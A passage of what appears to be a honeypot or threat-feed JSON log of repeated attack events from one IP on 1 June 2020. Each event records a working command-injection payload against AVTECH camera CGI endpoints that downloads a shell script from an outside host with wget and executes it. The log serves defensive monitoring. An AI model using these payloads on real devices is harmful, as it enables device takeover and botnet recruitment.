- "first_seen": "2020-06-01T05:07:08Z",
- "last_seen": "2020-06-01T05:24:05Z"
- },
- {
- "event_id": "28ae264b5796605b373875b96aabee4866052b5e2b3f5c659a7377c231b223e5",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8088,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:15:54Z",
- "last_seen": "2020-06-01T05:23:59Z"
- },
- {
- "event_id": "87c2398c4748915b2e02617716dd63f665ba004025743f6ceebe9c3fc83494bc",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8088,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:15:46Z",
- "last_seen": "2020-06-01T05:23:54Z"
- },
- {
- "event_id": "020af8e0b52276ba7ebf5e15c8c3ed6c759df783fdec1ef46bd7d754fa60411e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8181,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:04:51Z",
- "last_seen": "2020-06-01T05:23:50Z"
- },
- {
- "event_id": "ebead7e1694bd7056e659d31911e6300e98944dc30be0f37ba151cb3fc37e5cb",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:01:02Z",
- "last_seen": "2020-06-01T05:23:49Z"
- },
- {
- "event_id": "46b27f2c02c39c3f73456552ea513e13f5cbb0a55e50541e01585f9878cb94ff",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 52869,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:07:39Z",
- "last_seen": "2020-06-01T05:23:45Z"
- },
- {
- "event_id": "3eaddae391475b94fa0484ce6aab5ee8e8ce7951578e0d52e728b5cbf23094d7",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:00:55Z",
- "last_seen": "2020-06-01T05:23:42Z"
- },
- {
- "event_id": "6c37395a34fba75aff4463e445e3648b0cbf7a481b01dd247a79fd0f00a3ebc1",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8181,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:04:42Z",
- "last_seen": "2020-06-01T05:23:41Z"
- },
- {
- "event_id": "747d4f5e511bd30a2506c84a1a87c33f234f47a02021f1d4fb19077de5cb02e2",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 52869,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:07:31Z",
- "last_seen": "2020-06-01T05:23:39Z"
- },
- {
- "event_id": "00e8d2b8385580b5bca5638fafd9f3fc35b94c42fa7748f462f888d4cf1882c9",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 37215,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:04:20Z",
- "last_seen": "2020-06-01T05:23:33Z"
- },
- {
- "event_id": "c606affa80c2b8ddef48cd617e74b065ae07fb977fba38c4d110ec79fadb6069",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 37215,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:04:12Z",
- "last_seen": "2020-06-01T05:23:26Z"
- },
- {
- "event_id": "7fbecdbb9d459b4aaac226caf3fd458467b9b83a30ff4fee2f82987db6065054",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 10243,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:04:11Z",
- "last_seen": "2020-06-01T05:22:26Z"
- },
- {
- "event_id": "ffc701cb1de9b19ccbd7805c07a4cb714c22b55219e9bcbba500b6f4ba1e8cd9",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5900,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:05:22Z",
- "last_seen": "2020-06-01T05:22:24Z"
- },
- {
- "event_id": "ce82e6901c84cecd33d2cea1f4349998078a33d00c6200af90753f6db10f3060",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5900,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:05:15Z",
- "last_seen": "2020-06-01T05:22:19Z"
- },
- {
- "event_id": "4574bed270dae4dfe5a83cb579751f60336eae9488c762e2b624ecd834a5fb5d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10243,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:04:02Z",
- "last_seen": "2020-06-01T05:22:19Z"
- },
- {
- "event_id": "a044141f42fbb8d490df165f14486247799a245f72d22e23470789f3e38aa3d8",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:02:14Z",
- "last_seen": "2020-06-01T05:22:16Z"
- },
- {
- "event_id": "d64ef30af29e43c0cefcd09ab04928590bd7947809204f454ab11adcd3375a86",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:02:07Z",
- "last_seen": "2020-06-01T05:22:10Z"
- },
- {
- "event_id": "a6057ffdadfda85e5541e3bd7371dde914e402a5051127e2b0836c81cab3cff5",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8008,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:05:22Z",
- "last_seen": "2020-06-01T05:21:07Z"
- },
- {
- "event_id": "e003394e097114bd08af1e71d49b40ddd7651b2834e46af6e73467abfe1edccf",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:02:56Z",
- "last_seen": "2020-06-01T05:21:05Z"
- },
- {
- "event_id": "95bdb6eabbb7545314f57c69dd67009ea979318667e5f9b06ea3aefe616d62a1",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8008,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:05:16Z",
- "last_seen": "2020-06-01T05:21:01Z"
- },
- {
- "event_id": "cffaabaec5c99d59a1fab305170c38a4bbd0c4e2d4615a22876a22f5dc8de4d1",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:02:48Z",
- "last_seen": "2020-06-01T05:20:59Z"
- },
- {
- "event_id": "a616eca631d22ec13355047813a6cb3c437022130250b4a0b3853c2b01883f0e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8082,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:20:45Z",
- "last_seen": "2020-06-01T05:20:45Z"
- },
- {
- "event_id": "ebe80f2aebcc73241b2d84a37c408f3a63783e9922bbfe284cd749dae148cb1f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8082,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:20:39Z",
- "last_seen": "2020-06-01T05:20:39Z"
- },
- {
- "event_id": "00bb1d506f80dfa0ea433369a7487312a2e11b6814dad997647b2a3a14243ec5",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 49152,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:20:18Z",
- "last_seen": "2020-06-01T05:20:18Z"
- },
- {
- "event_id": "b077cba54577b840f0e51ea0618df9104b7aedb31e91a41ab76ee54a57063873",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:05:45Z",
- "last_seen": "2020-06-01T05:20:14Z"
- },
- {
- "event_id": "24779a54543793d47ac21e403ef0ad356c392a6bc854c37f78ebd02002ec75cd",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 49152,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:20:11Z",
- "last_seen": "2020-06-01T05:20:11Z"
- },
- {
- "event_id": "a212c53d9df997fa7adc05df7e066d75a023d764adbaa05ada0056b5d9ae8c83",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:14:06Z",
- "last_seen": "2020-06-01T05:19:46Z"
- },
- {
- "event_id": "fd803d50d4e12c65c011bbbb0b91a31dab4eb551a049f75ae9a7aba608405678",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:13:59Z",
- "last_seen": "2020-06-01T05:19:38Z"
- },
- {
- "event_id": "3ecff735092db24995c194fee4d80a921a33932a62de19e4d4696cbbaeed7bf6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8009,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:11:27Z",
- "last_seen": "2020-06-01T05:19:24Z"
- },
- {
- "event_id": "206dfd4f0ab4db09d2e3d098c2b3849dd25f7d6581e866610e520611d291b179",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:01:10Z",
- "last_seen": "2020-06-01T05:19:19Z"
- },
- {
- "event_id": "4f25fc959c81e1bb5913d97953a82f36622c30eb79386fbe54db4bf2820d66b1",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8009,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:11:18Z",
- "last_seen": "2020-06-01T05:19:17Z"
- },
- {
- "event_id": "403ff68437cc90bd36b993dd44f22f5fec502e8f29a341a1410e5bd48171ee60",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:01:03Z",
- "last_seen": "2020-06-01T05:19:13Z"
- },
- {
- "event_id": "62c8767b4cb6e8599e65e157d354daf1c723049c295b25e65c728b269fa2e691",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8880,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:19:04Z",
- "last_seen": "2020-06-01T05:19:04Z"
- },
- {
- "event_id": "b5e53f71ba8b4224f092a46d48a01bda11a9970c003668ef19e97ba8bce92292",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8880,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:18:58Z",
- "last_seen": "2020-06-01T05:18:58Z"
- },
- {
- "event_id": "b3b816201424b72991dffee37590da0b075e4419fa29b82399e762bca4225189",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:02:47Z",
- "last_seen": "2020-06-01T05:18:58Z"
- },
- {
- "event_id": "6bdf731535d3782aedd5d8c920a25b2b13406c0a832ca788bb5bf5f44b5a8c08",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:02:39Z",
- "last_seen": "2020-06-01T05:18:51Z"
- },
- {
- "event_id": "2d62b4a31738f25a18f8a84c597deab0ba4c947ea3be7b5e00f418823ae83450",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:02:03Z",
- "last_seen": "2020-06-01T05:18:48Z"
- },
- {
- "event_id": "86b4a2bd0fa40691199c5ff0cf201c222b42f3a77060a0dfaf20c47b0d7f3414",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:01:55Z",
- "last_seen": "2020-06-01T05:18:43Z"
- },
- {
- "event_id": "574ee0e872b9827e20ee61651c7174f349e4119882d954c182709b3ab283afb0",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 1388,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:18:34Z",
- "last_seen": "2020-06-01T05:18:34Z"
- },
- {
- "event_id": "0f12af1bd5ca47fd5d497ef604d3083d6f88ffabcca187db8a5013cfeed822cf",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
